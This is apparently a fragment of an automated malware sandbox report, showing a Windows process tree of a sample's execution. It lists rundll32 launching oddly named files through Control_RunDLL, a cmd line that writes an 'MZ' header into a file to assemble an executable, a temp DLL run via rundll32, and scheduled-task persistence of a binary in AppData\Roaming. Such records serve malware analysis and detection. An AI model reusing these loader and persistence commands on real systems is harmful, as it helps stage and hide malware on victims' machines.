C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I3⤵PID:3044
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I4⤵PID:3428
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I5⤵PID:3436
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"2⤵PID:2940
-
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1696 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2280
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:2580
-
C:\Users\Admin\AppData\Local\Temp\A8DD.exeC:\Users\Admin\AppData\Local\Temp\A8DD.exe1⤵PID:3480
-
C:\Windows\system32\taskeng.exetaskeng.exe {88DC8FB9-0262-4419-874A-4DAD7BFD60B4} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2644
-
C:\Users\Admin\AppData\Roaming\atcdjiuC:\Users\Admin\AppData\Roaming\atcdjiu2⤵PID:3092
-
-
C:\Program Files\Mozilla Firefox\default-browser-agent.exe"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task2⤵PID:2084
-
-
C:\Users\Admin\AppData\Roaming\atcdjiuC:\Users\Admin\AppData\Roaming\atcdjiu2⤵PID:3036
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {2FFECF69-D3B3-42D9-8CC7-1B401B0278D5} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:3984
-
C:\Windows\system32\taskeng.exetaskeng.exe {64A00E1C-98FF-44F8-95CE-3AEF789F33F6} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2472
-
C:\Users\Admin\AppData\Roaming\atcdjiuC:\Users\Admin\AppData\Roaming\atcdjiu2⤵PID:3664
-